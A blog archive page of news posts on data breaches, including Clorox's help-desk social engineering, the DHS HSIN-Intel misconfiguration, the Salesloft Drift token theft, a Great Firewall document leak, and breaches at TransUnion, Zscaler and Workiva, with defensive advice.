Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Data Breach. Show all posts
Social Engineering
Clorox Cognizant Data Breach Lawsuit Social Engineering

Clorox Blames $380M Breach on Service Desk Social Engineering, Sues Cognizant

 

In August 2023, the Scattered Spider group orchestrated a devastating social engineering attack against Clorox that resulted in approximately $380 million in damages, demonstrating how a simple phone call can lead to catastrophic business disruption . 

Modus operandi 

The attackers bypassed sophisticated cybersecurity measures through old-fashioned social engineering, repeatedly calling Cognizant's service desk and impersonating locked-out Clorox employees . Rather than exploiting technical vulnerabilities, they manipulated human psychology, using calm, scripted conversations to convince frontline agents to reset passwords and multi-factor authentication without proper verification . 

According to court filings, the attackers conducted thorough reconnaissance, collecting employee names, titles, recent hires, and internal ticket references to make their impersonation attempts more convincing . The legal complaint alleges that Cognizant agents violated agreed procedures by resetting credentials without properly authenticating callers first . 

Devastating impact 

The breach caused operational paralysis at Clorox, with production systems taken offline, manufacturing paused, and manual order processing implemented . The company experienced significant shipment delays that depressed sales volumes, with the total financial impact reaching roughly $380 million, including $49 million in direct remedial costs and hundreds of millions in business-interruption losses . 

Why outsourcing amplified risk

Outsourced help desks present unique vulnerabilities due to their broad cross-tenant privileges and high-volume workflows that can lead to shortcuts in verification processes . Large vendors handling numerous calls may experience "process drift," where agents prioritize getting users working over strict security verification . Additionally, third-party systems often create visibility gaps, with actions logged in separate systems that aren't fully integrated into customers' security monitoring . 

Defense recommendations 

Security experts recommend treating help-desk resets as privileged operations requiring out-of-band verification through company-owned phone callbacks or emailed tokens . High-risk resets should mandate two-person approval and automatic manager notifications . 

Organizations should implement automated telemetry to log every reset with immutable audit trails and alert on suspicious patterns like multiple resets from the same external number . Contract language with vendors must require technical controls, auditability, and regular social-engineering simulations to measure and improve verification processes .
Read more »
National Security
Access Controls Cybersecurity Data Breach DHS Information Security Intelligence Sharing National Security

Sensitive Intelligence Exposed in DHS Data Hub Security Lapse


 

There has been a serious concern about the integrity of federal data security in the wake of a critical vulnerability in a central data hub of the Department of Homeland Security (DHS). This vulnerability is thought to have exposed highly sensitive data to a broad range of unauthorized users, raising serious questions about the integrity of federal data security. 

An investigation by Wired revealed that a compromised system, intended to serve as a secure repository to consolidate intelligence and law enforcement data from multiple agencies, was compromised because access controls were incorrect. Instead of restricting access to classified material to properly cleared personnel, the flaw provided unauthorized entities, including adversarial actors, with an open door into classified data. 

Not only does the incident undermine the core purpose of the hub, which was designed to streamline and safeguard the intelligence-sharing process, but it also highlights the increasing risks and vulnerabilities that arise from the growing reliance of the federal government on vast, interconnected computer networks. 

Currently, it is estimated that 5,000 unauthorized individuals may have been able to access restricted data in some form or another. Despite this, officials at DHS have tried to minimize concerns by stressing that only a small number of interactions were flagged as potentially malicious after internal audits. 

However, given the scope of the exposure, the entire national security community is very concerned about the implications, especially since the compromised files contained operational intelligence which had been linked to ongoing investigations. There are many instances where such lapses have occurred before, including the breach that occurred in 2018 in which over 247,000 records pertaining to DHS employees were stolen from a secure database, and the phishing attack that occurred on Oregon DHS in 2019 that exposed 350,000 protected health information. 

Nevertheless, investigators in this case emphasize that the risk does not lie in stolen identities, but in the inadvertent visibility of intelligence information that adversaries might exploit to disrupt or undermine the government's operations, as happened here. The DHS Cyber Safety Review Board, along with federal investigators, have been investigating the incident since the incident. 

In their investigation, federal investigators cited systemic weaknesses within the department's IT infrastructure, particularly the reliance on outdated systems that are not integrated with modern cloud technology. An investigation revealed that the breach had been caused by an identity and access management (IAM) flaw in the DHS data hub framework. 

As a result, the platform used by the DHS data hub relied on a third-party vendor platform that went unpatched for over a year prior to the breach. By exploiting weak session tokens, unauthorized users were able to circumvent authentication protocols and gain read-only access to sensitive information. 

In light of these findings, there has been renewed criticism regarding vendor accountability and the persistent disconnect between federal cybersecurity policies and how they are being implemented on the ground. It has been determined that a DHS internal memorandum, which Wired obtained via a Freedom of Information Act (FOIA) request, indicates that the exposure continued from March to May 2023. 

While this was going on, the Office of Intelligence and Analysis (I&A) at the Department of Homeland Security (DHS) was incorrectly configured of an online platform that was intended to facilitate restricted information exchange as well as investigation leads by DHS. It was found that the system that serves as part of the Homeland Security Information Network’s intelligence section, called HSIN-Intel, was incorrectly configured to allow access to “everyone” rather than just authorized members of the intelligence community. 

Due to this, hundreds of thousands of people with HSIN accounts across the country, including some without a connection to intelligence or law enforcement, were inadvertently granted access to restricted information, even if they were not connected to intelligence or law enforcement. There were unintentional accesses of federal employees who were working in unrelated fields like disaster response, private contractors, and even foreign government representatives who were allowed to use the HSIN platform for other purposes. 

In light of the revelations, civil liberties advocates have been sharply critical, with Spencer Reynolds, a lawyer at the Brennan Center for Justice, who obtained the internal memo through a Freedom of Information Act request and shared it with Wired, stating that it raises serious concerns over the department’s commitment to safeguarding the department’s most confidential information. According to Reynolds, DHS advertises HSIN as secure and claims the information it contains is highly sensitive, crucial to national security. 

However, this incident raises serious concerns about the company's dedication to information security. Thousands and thousands of users have had access to information that they weren't supposed to receive. In addition to the trove of classified documents that were compromised, HSIN-Intel's holdings include investigative leads and investigative tips that range from reports on foreign hacking campaigns, disinformation operations, and analyses of domestic protest movements as well as snippets of articles from international publications.

A media report related to demonstrations against the Atlanta Public Safety Training Center, commonly referred to as the "Stop Cop City" protests, cited one example in which media coverage was positive toward confrontational police tactics. In addition to the 1,525 improper access to 439 intelligence products, the DHS inquiry also found that 518 people from the private sector and 46 foreigners had improperly accessed the products. 

There were nearly 40 percent of compromised materials that were associated with cybersecurity threats such as state-sponsored hacking groups targeting government IT infrastructure and cyber security threats. According to officials, some of the unauthorized US users who viewed the data had qualified for access through formal channels but never got the proper approval. In light of the incident, technology professionals in both government and industry should take heed of the warnings that precede rapid digital transformation when safeguards are often lagging behind in keeping up with the process. 

It has already been stated that there are similarities between this incident and the Johnson Controls malware attack of 2023, which, it is reported by SecurityAffairs, may have exposed DHS data through supply-chain vulnerabilities, highlighting similar systemic weaknesses as the misconfigurations that have been at the core of this incident. 

DHS has responded to this problem by engaging external cybersecurity firms to audit its platforms in an effort to make sure that a comprehensive review is being conducted. In addition, the DHS has been monitoring its platforms continuously in order to detect irregular access patterns in real time. In spite of this, Wired noted that long-term consequences may not be visible for years to come, underscoring the delicate balance federal agencies must strike between allowing data access for operational efficiency while safeguarding intelligence vital to national security at the same time. 

It is not only a single security lapse that has been committed by the Department of Homeland Security, but it is a reflection of a broader issue confronting modern governance as it becomes increasingly dependent on technology. The growing dependence on interconnected networks among federal agencies to coordinate intelligence operations and streamline operations has made even minor oversights in configurations or vendor management more likely to create national security vulnerabilities as the interconnected world continues to expand. 

There has been a consensus that to address such risks, more than just technological solutions, such as stronger encryption, automated monitoring and patch management, but cultural shifts within federal agencies will also be required, which should make cybersecurity a priority rather than just a compliance issue within the organization. 

In order to strengthen resilience and rebuild public trust in systems designed to safeguard national interests, better disclosure of breach information, tighter oversight of third-party vendors, and improved training for federal employees could all help strengthen public confidence and build resilience. At the same time, governments, companies, and international partners should collaborate more closely, as adversaries increasingly exploit cross-border digital ecosystems with greater sophistication as they work together to combat future threats. 

As the ten-year anniversary of the DHS breach draws closer, it may be seen as one of those moments of historical significance-an occasion when we should remember that secure information-sharing is a frontline defense for democratic institutions, not simply an administrative function.
Read more »
Salesloft
AWS Data Breach Developers GitHub organizations Salesloft

Salesloft Hack Shows How Developer Breaches Can Spread

 



Salesloft, a popular sales engagement platform, has revealed that a breach of its GitHub environment earlier this year played a key role in a recent wave of data theft attacks targeting Salesforce customers.

The company explained that attackers gained access to its GitHub repositories between March and June 2025. During this time, intruders downloaded code, added unauthorized accounts, and created rogue workflows. These actions gave them a foothold that was later used to compromise Drift, Salesloft’s conversational marketing product. Drift integrates with major platforms such as Salesforce and Google Workspace, enabling businesses to automate chat interactions and sales pipelines.


How the breach unfolded

Investigators from cybersecurity firm Mandiant, who were brought in to assist Salesloft, found that the GitHub compromise was the first step in a multi-stage campaign. After the attackers established persistence, they moved into Drift’s cloud infrastructure hosted on Amazon Web Services (AWS). From there, they stole OAuth tokens, digital keys that allow applications to access user accounts without requiring passwords.

These stolen tokens were then exploited in August to infiltrate Salesforce environments belonging to multiple organizations. By abusing the access tokens, attackers were able to view and extract customer support cases. Many of these records contained sensitive information such as cloud service credentials, authentication tokens, and even Snowflake-related access keys.


Impact on organizations

The theft of Salesforce data affected a wide range of technology companies. Attackers specifically sought credentials and secrets that could be reused to gain further access into enterprise systems. According to Salesloft’s August 26 update, the campaign’s primary goal was credential theft rather than direct financial fraud.

Threat intelligence groups have tracked this operation under the identifier UNC6395. Meanwhile, reports also suggest links to known cybercrime groups, although conclusive attribution remains unsettled.


Response and recovery

Salesloft said it has since rotated credentials, hardened its defenses, and isolated Drift’s infrastructure to prevent further abuse. Mandiant confirmed that containment steps have been effective, with no evidence that attackers maintain ongoing access. Current efforts are focused on forensic review and long-term assurance.

Following weeks of precautionary suspensions, Salesloft has now restored its Salesforce integrations. The company has also published detailed instructions to help customers safely resume data synchronization.

The incident underlines the risks of supply-chain style attacks, where a compromise at one service provider can cascade into breaches at many of its customers. It underscores the importance of securing developer accounts, closely monitoring access tokens, and limiting sensitive data shared in support cases.

For organizations, best practices now include regularly rotating OAuth tokens, auditing third-party app permissions, and enforcing stronger segmentation between critical systems.


Read more »
State-Sponsored Monitoring
Authoritarian Technology Cybersecurity Leak Data Breach digital surveillance Great Firewall Internet censorship State-Sponsored Monitoring

Great Firewall of China Compromised in Historic 600GB Data Exposure


 

It has been reported that on September 11, 2025, nearly 600 gigabytes of classified materials linked to the Great Firewall of China have emerged online in a breach of China's closely guarded internet censorship machinery, which is a breach of scale that has never been experienced. This leaked cache of internal GFW documents, which experts have described as the largest exposure of internal GFW documents ever in history, provides a rare opportunity to get a closer look at Beijing's highly automated digital surveillance system. 

It is a collection of data that has been gathered from Geedge Networks, a company founded and led by Fang Binxing, one of the most renowned scientists in the world, along with the MESA Lab at the Institute of Information Engineering of the Chinese Academy of Sciences, which has collected and archived source code, internal communications, development logs, and archives of project management tools for a period of many years. 

According to researchers who examined the document, the revelation not only confirms Chinese national security sweeping domestic control, but reveals how censorship and surveillance technology, packaged as deployable hardware and software systems, has been exported overseas. Geedge's services are indicated in the documents, not only to sensitive domestic regions such as Xinjiang, Jiangsu, and Fujian, but also to governments in Myanmar, Pakistan, Ethiopia, and Kazakhstan, with further signs that the company's services may be deployed under the Belt and Road Initiative.

A 500GB archive of server repositories, detailed manuals, and operational files is one of the details of the breach that indicates not just a compromise of a state secret but also a glimpse into how China's digital authoritarian model of digital authority has been refined and marketed for international use as well. 

There are two pivotal institutions at the heart of China's online censorship regime, which are referred to in the cache of leaked files: Geedge Networks and MESA Lab of the Institute of Information Engineering under the Chinese Academy of Sciences. As a result of the work of Geedge, led by its chief scientist, Fang Binxing— widely known as “Father of the Great Firewall”—Geedge has been seen for decades as the technical brain behind the operation of the firewall system. 

There has been a forensic investigation into the incident, and it appears the attackers have exploited an incorrectly configured private code repository to gain access to backup snapshots, archived communications, and development environments. A single mirror archive of RPM packaging servers was estimated to have accounted for 500 GB of the material that was exposed, along with years' worth of documentation, JIRA project management data, and technical manuals. 

It turned out that the breach exposed nearly 600 gigabytes of data. In the files, scientists found evidence that Geedge was not only located in provinces such as Xinjiang, Jiangsu, and Fujian, which represent some of the worst cases of domestic censorship, but was also supplying censorship as a service to other countries under the Belt and Road Initiative. 

The contract and proposal details the provision of keyword blacklists, real-time traffic monitoring, cloud-based filtering appliances, and other services to the governments of Myanmar, Pakistan, Ethiopia, and Kazakhstan, with diplomatic communications suggesting additional undisclosed customers. 

In the leak, a parallel role also comes to light for MESA Lab, which was established in 2012 as the Processing Architecture Team for "Massive Effective Stream Analysis" and eventually became an international research centre worth millions of yuan. 

The lab maintains internal source code and development records, which expose sophisticated algorithms for packet inspection, dynamic rule enforcement, and evasion detection, including simulated testing against encrypted tunnels circumvention tools as well as testing against encryption tunnels and circumventions. 

The documents, which have been carefully reviewed by organisations such as GFW Report and Net4People on isolated systems, are seen as a groundbreaking intelligence breakthrough by analysts. They provide an unparalleled understanding of the mechanism of state-sponsored internet controls while raising important questions regarding the export of authoritarian surveillance techniques to the global marketplace. 

The leaked cache contains nearly 600 gigabytes and tens of thousands of files and repositories, and together, they provide a rare and intricate insight into the machinery of China's censorship system, with its complex and comprehensive policies governing the internet. In its core lies a massive 500GB mirror archive of RPM packaging servers. This demonstrates to us that, in addition to being a political construct, the Great Firewall is a highly engineered software ecosystem that is maintained to the same standard as a large, corporate-scale IT operation. Additional archives such as geedge_docs.tar.zst and mesalab_docs.tar.zst contain countless internal reports and research proposals. 

A number of the files referencing projects such as “CTF-AWD,” “BRI,” and “CPEC” suggest connections and international collaborations that are based on the Belt and Road Initiative, while project management data and communication drafts show the coordination of researchers and engineers on a daily basis. 

Even though many documents appear mundane, such as reimbursement receipts and documents labelled simply “Print”, censorship is still an institutionalised part of bureaucratic processes and procedures. There are a number of things that distinguish this leak from other types of breaches, the most remarkable being its breadth and granularity. Instead of only a few emails or whistleblower memos, this collection comprises raw operational information that reveals years of investment, research, and development. 

Several independent researchers, including Net4People, Hackread.com, and others, have noted that the file tree itself tells a great deal about the Firewall's evolution into a distributed, export-ready system. Additionally, the background materials also examine how the MESA Lab grew in 2012 from a small research lab at the Chinese Academy of Sciences into a multi-million dollar operation that contributed to national cybersecurity awards in 2016, which had been opened in 2016. 

Originally created under the guidance of Fang Binxing, who is given credit for designing the Great Firewall, Geedge Networks quickly absorbed the talents of the MESA and has quickly emerged as one of the few private firms capable of supporting state censorship both domestically and internationally. 

The immediate revelations of Chinese internet control infrastructure confirm what many observers have long suspected: that while the full analysis of source code may take months, they already confirm what many observers have long suspected. There is no static or insular Chinese internet control infrastructure. Instead, it is a living system shaped by government contracts, academic research, and private enterprise, and increasingly packaged for export to other countries. 

A hacktivist group behind the disclosure has warned that examining the files should only be done in an isolated environment because there might be embedded malware and tracking elements in them. Despite these dangers, researchers and rights advocates argue that the trove offers the chance to gain a comprehensive understanding of the Great Firewall, both in terms of how it worsens and how its influence is being systematically extended outside of the country. 

This unprecedented exposé of the Great Firewall's inner workings is far more than a breach - it marks an important turning point in the global debate around digital rights, sovereignty, and the export of surveillance technology worldwide. In the context of governments, these files provide an unfiltered look at how authoritarian states operationalised censorship, transforming it into a scaled, almost commodified system that is capable of deploying well outside their own borders. 

As researchers and civil society groups, we find that this material is an invaluable resource unravelling censorship mechanisms, developing countermeasures, and creating stronger tools to circumvent censorship. 

As a result of these revelations, policymakers around the world need to look at how Chinese surveillance infrastructure is spread through initiatives like the Belt and Road initiative, and to weigh the geopolitical implications of supporting regimes that restrict freedom of expression to take appropriate measures. Since the data is subject to potential security risks, it is imperative to handle it carefully. 

However, its availability presents an excellent opportunity to improve transparency, accountability, and resilience against digital authoritarianism, as well as strengthening transparency, accountability, and resilience. If used responsibly, this leak could not only reshape the way people perceive China's censorship model but also help to spark international efforts to safeguard the open internet in general.
Read more »
Zscaler
Cybersecurity Attack Data Breach Data Theft trending news Zscaler

Zscaler Confirms Data Breach Linked to Salesloft Drift Supply-Chain Attack

 

Cybersecurity firm Zscaler has revealed it suffered a data breach after attackers exploited a compromise in Salesloft Drift, an AI-driven Salesforce integration tool. The incident is part of a larger supply-chain attack in which stolen OAuth and refresh tokens were leveraged to gain unauthorized access to Salesforce environments across multiple organizations. 

Zscaler confirmed that its Salesforce instance was one of the targets, resulting in the exposure of sensitive customer details. According to the company, the information accessed by threat actors included customer names, job titles, business email addresses, phone numbers, and geographic details. In addition, data related to Zscaler product licensing, commercial agreements, and content from certain support cases was also stolen. 

While Zscaler has not disclosed the number of affected customers, it emphasized that the breach was limited to its Salesforce system and did not compromise any of its products, services, or underlying infrastructure. 

The company stated that the unauthorized data access primarily took place between August 13 and 16, 2025, with some attempts occurring earlier. Although Zscaler has not detected any misuse of the stolen data, it has urged its customers to remain cautious of phishing emails and social engineering campaigns that could exploit the compromised information. 

In response to the incident, Zscaler has taken several steps to mitigate risks, including revoking all Salesloft Drift integrations with Salesforce, rotating API tokens across its systems, and implementing stricter customer authentication protocols when handling support requests. 

An internal investigation into the full scope of the breach is ongoing. The attack has been linked to a campaign attributed to the threat group UNC6395, which was previously flagged by Google Threat Intelligence. This group is believed to have targeted Salesforce support cases to collect highly sensitive credentials such as AWS access keys, passwords, and Snowflake tokens. 

Google researchers also noted that the attackers attempted to cover their tracks by deleting query jobs, although audit logs remained available for review. The compromise of Salesloft Drift has had wide-reaching consequences across the SaaS ecosystem, impacting companies including Google, Cisco, Workday, Adidas, Qantas, Allianz Life, and LVMH subsidiaries. 

In many of these cases, attackers used vishing tactics to trick employees into authorizing malicious OAuth applications, enabling large-scale data theft later exploited in extortion schemes. 

Both Google and Salesforce have since suspended their Drift integrations while investigations continue. Security experts warn that this incident highlights the growing risks of supply-chain attacks and the urgent need for stronger oversight of third-party integrations.
Read more »
TransUnion
Consumer Protection Cybersecurity Data Breach Identity Theft Social Engineering third-party risk TransUnion

Credit Bureau TransUnion Confirms Breach Impacting Millions


 

In the apparent wake of growing threats to consumers' personal information, credit reporting giant TransUnion has recently announced a cybersecurity incident that exposed personal information from more than 4.4 million Americans. Several regulators and state attorneys general have confirmed that the breach took place on July 28, 2025, and was discovered just two days later by investigators. 

Among the data exposed was sensitive information such as names, Social Security numbers, and dates of birth, which were linked to a third-party application that was used by TransUnion in its U.S. consumer operations. In its statement, TransUnion clarified that the breach was limited in scope, clarifying that its internal systems and core credit reporting databases were not impacted by the breach. 

The company also stated that no credit reports or core financial records - information that could be highly valuable to fraudsters - were accessed by anyone. TransUnion filed notifications in Maine and Texas indicating that the incident was related to a third-party platform that was reportedly linked to Salesforce, rather than TransUnion's own infrastructure. 

Despite the company’s description of the exposure, which was limited to “some limited personal data”, the magnitude of the breach underscores the ongoing risks associated with external service providers in the financial services industry. 

Recent years have seen a growing concern for credit bureaus as consumer information has become increasingly attractive to cybercriminals as a target. This latest security incident is another in a long string of security incidents that have impacted major financial institutions in recent years, highlighting the difficulty of safeguarding sensitive information across a complex digital ecosystem. 

In addition to Experian and Equifax, TransUnion is one of the nation's "big three" credit reporting agencies, and together with them, they play an important role in shaping our nation's financial system by compiling detailed credit histories on nearly every consumer who has an active credit history. These files are used to create credit reports that lenders, landlords, and employers use in order to gauge a person's financial security, and they are also used to build widely known scoring models like FICO. 

This is the method by which lenders, landlords, and employers use to calculate a credit score that is composed of three digits. It is therefore natural for breaches involving such institutions to have such a significant impact on consumers and the economy as a whole. Taking a step in response to the latest incident, TransUnion has begun to send out letters to affected individuals directly and has urged consumers to contact the fraud helpline at 1-800-516-4700, which is open on weekdays, to find out if they are in good standing. 

In addition, experts suggest that consumers periodically review their credit reports across the three credit bureaus—which can be accessed for free once a week by visiting AnnualCreditReport.com.com—to see if there are any inaccuracies or if there are signs that something is amiss. As a measure of further security, paid services, like MyFico, can track FICO scores in real time and monitor fraud, while platforms like Credit Karma and WalletHub offer free VantageScore reports to subscribers who enrol in them. 

The TransUnion company initially stated that there had been no compromise of credit files; however, subsequent disclosures told a much more troubling story. According to regulatory filings filed with the Texas Attorney General’s office, among the exposed data set were names, dates of birth, and Social Security numbers, which are some of the most sensitive identifiers in the world today. 

There is no way to monitor or reset Social Security numbers, unlike credit information, which can be monitored or reset, and it may serve as a gateway to long-term identity theft and fraud. Several financial security experts warn that such information can be used for a number of purposes, including opening unauthorised credit lines, applying for loans or government benefits under stolen identities, submitting false tax returns, and other financial crimes. 

Considering that TransUnion is among the largest credit bureaus in the nation and holds records on over 260 million Americans, this breach raises serious concerns about the resilience of institutions that safeguard some of the country’s most critical consumer information. As a consequence of the breach, which was detected on July 28  and contained within hours, affected individuals have now been notified about it. 

There has been no compromise of TransUnion's core credit database or consumer credit reports, a company that is among the nation's three primary credit bureaus, along with Equifax and Experian. Rather, the intrusion was traced back to a third-party application supporting U.S. consumer operations, where unauthorised access allowed for the publication of limited personal information. According to court filings in Maine and Texas, however, names, birthdates, and Social Security numbers were among the data that had been compromised. 

In order to assess the full scope of this incident, TransUnion has engaged an independent cybersecurity expert to conduct a forensic analysis. The incident occurred in the midst of a large wave of cyberattacks targeting Salesforce-connected software. In June, Google revealed that hackers were using modified versions of Salesforce-related tools for infiltration and stealing large amounts of sensitive data from cloud systems. ShinyHunters, a cybercriminal organisation suspected of being involved in such campaigns, has been accused of using extortion tactics against employees of victim companies.

Security researchers have noted that some of the biggest corporations in the world have been breached in similar ways in recent months, including Google, Farmers Insurance, Allianz Life, Workday, Pandora, Cisco, Chanel, and Qantas. This highlights the importance of supply-chain vulnerabilities in a wide range of popular platforms as well as the dangers they pose. 

According to Salesforce, social engineering attacks against users, and not flaws in Salesforce's platform, were at fault, as it has maintained. A comparison is inevitably drawn with Equifax's 2017 data breach, one of the biggest in U.S. history, in which 147 million Americans' personal data was exposed, costing the company nearly $700 million in settlements and fines, and ultimately causing the company to lose millions of dollars. 

In the wake of this incident, congressional hearings were held and scrutiny of the credit reporting industry heightened, which led to state and federal government reforms aimed at strengthening consumer data protection. As a result of the TransUnion breach, security experts are once again urging the affected to be vigilant, reviewing their credit reports, setting up fraud alerts, and monitoring their accounts to ensure that unusual activity does not occur. 

As of right now, AnnualCreditReport.com is providing free weekly credit reports from all three major credit bureaus. Additional monitoring services may also provide a means of detecting signs of fraud, while in the meantime, Schubert Jonckheer & Kolbe has announced an investigation into the TransUnion incident, signalling the possibility of further litigation. 

TransUnion has yet to provide any details regarding the new safeguards that TransUnion intends to implement, nor has it specified whether financial restitution will be provided to victims. There have been a growing number of high-profile breaches involving third-party providers, which have been attributed to vulnerabilities in those third parties during the last few years.

For example, in June 2025, a cyberattack against chains IQ chain exposed proprietary data and banking information of the banking giant UBS. The following month, Allianz Life announced that a compromised cloud-based customer relationship management system had been used to obtain personal information regarding the majority of the company's 1.4 million American customers. That same month, Qantas confirmed that approximately six million customer records were exposed after hackers breached a third-party customer service platform on which Qantas had relied. 

Researchers have identified many of these incidents as related to cybercriminal groups such as ShinyHunters and Scattered Spider, both of which specialise in exploiting third-party information technology and cloud providers, and both of which specialise in using advanced social engineering tactics to do so. A number of these groups are thought to be associated with "The Com," a sprawling, loosely organised, cybercriminal community comprised of thousands of English-speaking actors who have collaborated on data theft, extortion, and fraud campaigns across a wide range of industries. 

A number of recent incidents have highlighted the persistent vulnerability of third-party platforms, as well as the increasing sophistication of cybercriminal groups attacking the financial services industry. As consumers are reminded by the breach, even when core systems remain intact, the theft of identifying information like Social Security numbers can result in long-term impacts that go beyond the initial intrusion, even if the original intrusion is not detected. 

It is highly recommended that individuals do more than simply review their credit reports—by freezing their credit with all three credit bureaus, a person is preventing the opening of a new account in their name by criminals, while a fraud alert can assist in making it more difficult for the criminals to take advantage of stolen information. 

Moreover, consumers should also consider employing identity monitoring tools that can provide them with the ability to scan the dark web for compromised information before potential misuse turns into financial damage. 

There is also a clear lesson to be learned from reliance on third-party applications: organisations need not only contractual protection but also continuous monitoring, rigorous vetting, and layers of defence to prevent unauthorised access to their systems. Increasingly, supply chain attacks will be a growing problem, and resilience will be dependent upon proactive investment in security as well as consumer awareness of the threats.
Read more »
Personal Information
Dark Web Data Breach data security Data Theft Discord Discord Users leaked sensitive data personal data security Personal Information

Nearly Two Billion Discord Messages Scraped and Sold on Dark Web Forums

 

Security experts have raised alarms after discovering that a massive collection of Discord data is being offered for sale on underground forums. According to researchers at Cybernews, who reviewed the advertisement, the archive reportedly contains close to two billion messages scraped from the platform, alongside additional sensitive information. The dataset allegedly includes 1.8 billion chat messages, records of 35 million users, 207 million voice sessions, and data from 6,000 servers, all available to anyone willing to pay. 

Discord, a platform widely used for gaming, social communities, and professional groups, enables users to connect via text, voice, and video across servers organized around different interests. Many of these servers are open to the public, meaning their content—including usernames, conversations, and community activity—can be accessed by anyone who joins. While much of this information is publicly visible, the large-scale automated scraping of data still violates Discord’s Terms of Service and could potentially breach data protection regulations such as the EU’s General Data Protection Regulation (GDPR) or California’s Consumer Privacy Act (CCPA).

The true sensitivity of the dataset remains unclear, as no full forensic analysis has been conducted. It is possible that a significant portion of the messages and voice records were collected from publicly accessible servers, which would reduce—but not eliminate—the privacy concerns. However, the act of compiling, distributing, and selling this information at scale introduces new risks, such as the misuse of user data for surveillance, targeted phishing, or identity exploitation. 

Discord has faced similar challenges before. In April 2024, a service known as Spy.Pet attempted to sell billions of archived chat logs from the platform. That operation was swiftly shut down by Discord, which banned the associated accounts and confirmed that the activity violated its rules. At the time, the company emphasized that automated scraping and self-botting were not permitted under its Terms of Service and stated it was exploring possible legal action against offenders. 

The recurrence of large-scale scraping attempts highlights the ongoing tension between the open nature of platforms like Discord and the privacy expectations of their users. While public servers are designed for accessibility and community growth, they can also be exploited by malicious actors seeking to harvest data en masse. Even if the information being sold in the latest case is largely public, the potential to cross-reference user activity across communities raises broader concerns about surveillance and abuse. 

As of now, Discord has not issued an official statement on this latest incident, but based on previous responses, it is likely the company will take steps to disrupt the sale and enforce its policies against scraping. The incident serves as another reminder that users on open platforms should remain mindful of the visibility of their activity and that service providers must continue to balance openness with strong protections against data misuse.
Read more »
unauthorised access
Data Breach MTA Ransomware attack Security Breach unauthorised access

Maryland’s Paratransit Service Hit by Ransomware Attack

 

The Maryland Transit Administration (MTA), operator of one of the largest multi-modal transit systems in the United States, is currently investigating a ransomware attack that has disrupted its Mobility paratransit service for disabled travelers. 

While the agency’s core transit services—including Local Bus, Metro Subway, Light Rail, MARC, Call-A-Ride, and Commuter Bus—remain operational, the ransomware incident has left the MTA unable to accept new ride requests for its Mobility service, which is critical for individuals with disabilities who rely on specialized transportation. 

According to the MTA, the cybersecurity breach involved unauthorized access to certain internal systems. The agency is working closely with the Maryland Department of Information Technology to assess and mitigate the impact. Riders who had already scheduled Mobility trips prior to the attack will still receive their services as planned. However, until the issue is resolved, new bookings cannot be processed through the standard Mobility system.

In response to the disruption, the MTA is directing eligible customers to its Call-A-Ride program as an alternative. This service can be accessed online or by phone, providing a temporary solution for those in need of transportation while the Mobility system remains unavailable for new requests.

The agency has emphasized its commitment to resolving the incident quickly and securely, promising regular updates as more information becomes available. 

This incident is not isolated. Over the past two years, similar ransomware attacks have targeted paratransit and public transit services in multiple states, including Missouri and Virginia, often leaving municipalities to scramble for alternative solutions for disabled residents.

The MTA has stated that its primary focus is on ensuring the safety and security of both customers and employees. It is collaborating with government partners and media outlets to keep the public informed and to support affected communities throughout the recovery process. 

The MTA’s experience underscores the growing risk that ransomware poses to critical public infrastructure, particularly services that support vulnerable populations. As investigations continue, the agency urges customers to stay informed through official channels and to utilize available alternatives like Call-A-Ride until normal operations can resume.
Read more »
Whistleblower
Data Breach DODGE Social Security US Citizens Whistleblower

Whistleblower: Social Security Data of 300 Million Americans at Risk After Agency Mishandling

 

A whistleblower has alleged that Social Security information belonging to over 300 million Americans was compromised when Department of Government Efficiency (DOGE) personnel uploaded sensitive data to a cloud storage system lacking adequate security oversight.

The potentially exposed information encompasses a broad range of personal details, including medical diagnoses, financial records, banking data, family relationships, and biographical information. 

The whistleblower expressed concerns that malicious actors gaining access to this cloud environment could enable massive identity theft schemes, potentially disrupting Americans' access to essential healthcare and food assistance programs while forcing the government to undertake the costly process of reissuing Social Security numbers nationwide. 

The Social Security Administration has acknowledged the whistleblower's claims while appearing to minimize their severity. Officials stated that personal information remains housed in secure systems with comprehensive protective measures and emphasized that the data resides in an established SSA environment isolated from internet access. 

The agency maintains it has not detected any security compromises to this system. Despite these assurances, cybersecurity experts warn of substantial risks to personal information resulting from government data handling practices. 

Safety measures 

Financial advisors recommend maintaining calm while implementing protective measures. Melissa Caro from My Retirement Network notes that while such incidents are concerning, Americans' personal information faces constant exposure through various channels. She emphasizes that Social Security numbers have been compromised repeatedly in the past, making ongoing protective measures essential. 

Experts recommend two primary defense strategies: 

Credit monitoring: Establish free accounts with all three major credit bureaus to regularly review credit reports and identify potential issues. The federally authorized AnnualCreditReport.com provides weekly access to reports from Equifax, Experian, and TransUnion, enabling users to monitor their credit profiles for unauthorized activity. 

Credit freezes: Implement credit freezes across all bureau profiles to prevent unauthorized account openings. Catherine Valega from Green Bee Advisory strongly endorses this approach as immediate protection. These free protective measures outperform most commercial identity protection services.

Additional security practices include using unique passwords with multi-factor authentication and maintaining skepticism toward unsolicited communications allegedly from Social Security or financial institutions. Caro emphasizes that regardless of this specific incident, these protective steps should be standard practice given the persistent threat landscape.
Read more »
Workiva
Cloud Server CloudFlare CRM Cybersecurity Data Breach phishing Salesforce ShinyHunters Vulnerabilities Workday Workiva

Workiva Confirms Data Breach in Wake of Salesforce Security Incident


 

A recent cyberattack on Salesforce customers has prompted Workiva to disclose a breach linked to a recent wave of attacks, serving as a reminder of the increasing cybersecurity risks faced by global organisations. Workiva provides financial reporting, compliance, and audit software, as well as financial reporting and compliance software, based in the cloud. 

As the company confirmed, attackers have accessed a third-party customer relationship management system (CRM), exposing information about limited company contact details, including names, email addresses, phone numbers, and support ticket information. As an important note, Workiva stressed that its own platform and customer data remain safe and secure. 

According to the ShinyHunters extortion group, the breach is part of a broader campaign that has been carried out by the threat actors to gain unauthorized access to sensitive business information, including exploiting OAuth tokens and conducting voice phishing. As a result of these attacks, Workiva has warned customers that spear phishing attempts should not be ignored and emphasized that all official communications will continue to come from its verified support channels only. 

According to Workiva, whose cloud-based platform is widely used for financial reporting, compliance and audit processes, the breach could be traced back to unauthorized access to the customer relationship management system of a third party. There has been a breach of security at Adobe. 

In notifications sent to clients who may be affected, the company disclosed that attackers were able to access a limited set of business contact details, such as names, email addresses, phone numbers, and support tickets data. As Workiva clarified, its core platform and any customer data stored inside it have not been compromised, rather the intrusion originated via a connected third-party application that was managed by the vendor responsible for Workiva's customer relationship management system. 

